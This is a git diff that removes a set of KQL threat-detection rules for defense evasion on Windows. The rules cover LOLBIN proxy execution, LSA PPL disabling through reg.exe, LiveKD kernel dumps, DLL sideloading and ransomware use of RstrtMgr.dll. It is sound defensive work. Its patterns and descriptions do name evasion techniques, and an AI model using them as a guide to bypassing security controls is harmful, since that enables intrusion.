100644 index 5249425a..00000000 --- a/Defense Evasion/JScript_Compiler_Execution.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/05/02 -// Level: low -// Description: Detects the execution of the "jsc.exe" (JScript Compiler). -Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting. - -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe" \ No newline at end of file diff --git a/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql b/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql deleted file mode 100644 index 1aa5330d..00000000 --- a/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/11/01 -// Level: high -// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\kavremover.exe" or InitiatingProcessFolderPath endswith "\\cleanapi.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql b/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql deleted file mode 100644 index 66c34716..00000000 --- a/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/16 -// Level: high -// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe") \ No newline at end of file diff --git a/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql b/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql deleted file mode 100644 index 9661cd24..00000000 --- a/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/29 -// Level: high -// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. - -// Tags: attack.defense_evasion, attack.t1036.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS")) \ No newline at end of file diff --git a/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql b/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql deleted file mode 100644 index 3a052bf3..00000000 --- a/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/22 -// Level: high -// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process -// Tags: attack.defense_evasion, attack.t1562.010 -DeviceProcessEvents -| where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql b/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql deleted file mode 100644 index 6b429c52..00000000 --- a/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. -// Tags: attack.defense_evasion, attack.t1216.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1" \ No newline at end of file diff --git a/Defense Evasion/Legitimate_Application_Dropped_Archive.kql b/Defense Evasion/Legitimate_Application_Dropped_Archive.kql deleted file mode 100644 index 61f36222..00000000 --- a/Defense Evasion/Legitimate_Application_Dropped_Archive.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Florian Roth -// Date: 2022/08/21 -// Level: high -// Description: Detects programs on a Windows system that should not write an archive to disk -// Tags: attack.defense_evasion, attack.t1218 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx") \ No newline at end of file diff --git a/Defense Evasion/Legitimate_Application_Dropped_Executable.kql b/Defense Evasion/Legitimate_Application_Dropped_Executable.kql deleted file mode 100644 index 7435b284..00000000 --- a/Defense Evasion/Legitimate_Application_Dropped_Executable.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022/08/21 -// Level: high -// Description: Detects programs on a Windows system that should not write executables to disk -// Tags: attack.defense_evasion, attack.t1218 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx") \ No newline at end of file diff --git a/Defense Evasion/Legitimate_Application_Dropped_Script.kql b/Defense Evasion/Legitimate_Application_Dropped_Script.kql deleted file mode 100644 index 73e265bc..00000000 --- a/Defense Evasion/Legitimate_Application_Dropped_Script.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022/08/21 -// Level: high -// Description: Detects programs on a Windows system that should not write scripts to disk -// Tags: attack.defense_evasion, attack.t1218 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh") \ No newline at end of file diff --git a/Defense Evasion/LiveKD_Driver_Creation.kql b/Defense Evasion/LiveKD_Driver_Creation.kql deleted file mode 100644 index 7e5f529f..00000000 --- a/Defense Evasion/LiveKD_Driver_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/16 -// Level: medium -// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" \ No newline at end of file diff --git a/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql b/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql deleted file mode 100644 index 69e1685e..00000000 --- a/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/16 -// Level: high -// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe". -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceFileEvents -| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe"))) \ No newline at end of file diff --git a/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql b/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql deleted file mode 100644 index 003653f9..00000000 --- a/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/16 -// Level: high -// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceFileEvents -| where FolderPath =~ "C:\\Windows\\livekd.dmp" \ No newline at end of file diff --git a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql b/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql deleted file mode 100644 index 815998df..00000000 --- a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Luc Génaux -// Date: 2023/11/28 -// Level: high -// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. -This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. -It could also be used for anti-analysis purposes by shut downing specific processes. - -// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001 -DeviceImageLoadEvents -| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\"))) \ No newline at end of file diff --git a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql b/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql deleted file mode 100644 index c3b92be9..00000000 --- a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Luc Génaux -// Date: 2023/11/28 -// Level: low -// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. -This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. -It could also be used for anti-analysis purposes by shut downing specific processes. - -// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001 -DeviceImageLoadEvents -| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp")))) \ No newline at end of file diff --git a/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql deleted file mode 100644 index aa25bb7b..00000000 --- a/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/29 -// Level: medium -// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\runexehelper.exe" \ No newline at end of file diff --git a/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql deleted file mode 100644 index a4536f33..00000000 --- a/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali -// Date: 2022/12/29 -// Level: medium -// Description: Detect usage of the "ssh.exe" binary as a proxy to launch other programs -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenSSH\\sshd.exe" or ((ProcessCommandLine contains "ProxyCommand=" or (ProcessCommandLine contains "PermitLocalCommand" and ProcessCommandLine contains "LocalCommand")) and FolderPath endswith "\\ssh.exe") \ No newline at end of file diff --git a/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql deleted file mode 100644 index 2dc54c90..00000000 --- a/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/29 -// Level: medium -// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains " /HideWMP" and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe") \ No newline at end of file diff --git a/Defense Evasion/MSHTA_Suspicious_Execution_01.kql b/Defense Evasion/MSHTA_Suspicious_Execution_01.kql deleted file mode 100644 index 280ba986..00000000 --- a/Defense Evasion/MSHTA_Suspicious_Execution_01.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule) -// Date: 2019/02/22 -// Level: high -// Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism -// Tags: attack.defense_evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020.1599 -DeviceProcessEvents -| where (ProcessCommandLine contains "vbscript" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains ".dll") and FolderPath endswith "\\mshta.exe" \ No newline at end of file diff --git a/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql b/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql deleted file mode 100644 index b3590a9b..00000000 --- a/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/21 -// Level: high -// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains "C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords" \ No newline at end of file diff --git a/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql deleted file mode 100644 index a55dc381..00000000 --- a/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/08/12 -// Level: high -// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications -Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded - -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002 -DeviceFileEvents -| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft" \ No newline at end of file diff --git a/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql b/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql deleted file mode 100644 index 96432dcf..00000000 --- a/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community -// Date: 2020/10/14 -// Level: medium -// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. -This option may be used adversaries to execute malicious code by signed verified binary. -The debugger is installed alongside with Microsoft Visual Studio package. - -// Tags: attack.t1218, attack.defense_evasion -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql b/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql deleted file mode 100644 index a7baffeb..00000000 --- a/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Agro (@agro_sev) oscd.community -// Date: 2020/10/13 -// Level: low -// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces -Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe" \ No newline at end of file diff --git a/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql b/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql deleted file mode 100644 index 2be19bac..00000000 --- a/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Florian Roth -// Date: 2021/07/12 -// Level: high -// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013 -DeviceProcessEvents -| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe")) \ No newline at end of file diff --git a/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql b/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql deleted file mode 100644 index 894acf23..00000000 --- a/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/03/19 -// Level: low -// Description: Detects changes to the "MaxMpxCt" registry value. -MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. -Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic. - -// Tags: attack.defense_evasion, attack.t1070.005 -DeviceRegistryEvents -| where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt" \ No newline at end of file diff --git a/Defense Evasion/Microsoft_Office_DLL_Sideload.kql b/Defense Evasion/Microsoft_Office_DLL_Sideload.kql deleted file mode 100644 index 7003f77d..00000000 --- a/Defense Evasion/Microsoft_Office_DLL_Sideload.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: high -// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE"))) \ No newline at end of file diff --git a/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql b/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql deleted file mode 100644 index f541d3c2..00000000 --- a/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/06/08 -// Level: high -// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Security\\ProtectedView") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV"))) \ No newline at end of file diff --git a/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql b/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql deleted file mode 100644 index 49fbaa43..00000000 --- a/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: elhoim -// Date: 2022/04/28 -// Level: medium -// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. -// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql b/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql deleted file mode 100644 index fc3958d8..00000000 --- a/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman, frack113 -// Date: 2019/01/16 -// Level: medium -// Description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. -// Tags: attack.defense_evasion, attack.execution, attack.t1127, attack.t1218 -DeviceProcessEvents -| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe" \ No newline at end of file diff --git a/Defense Evasion/Modification_of_IE_Registry_Settings.kql b/Defense Evasion/Modification_of_IE_Registry_Settings.kql deleted file mode 100644 index b0b1e710..00000000 --- a/Defense Evasion/Modification_of_IE_Registry_Settings.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/22 -// Level: low -// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryKey contains "\\Accepted Documents" or RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision")))) \ No newline at end of file diff --git a/Defense Evasion/Modify_Group_Policy_Settings.kql b/Defense Evasion/Modify_Group_Policy_Settings.kql deleted file mode 100644 index 45d1feba..00000000 --- a/Defense Evasion/Modify_Group_Policy_Settings.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/19 -// Level: medium -// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1484.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql b/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql deleted file mode 100644 index 0c15a4a8..00000000 --- a/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: Sreeman -// Date: 2020/10/29 -// Level: medium -// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. -When the job runs on the system the command 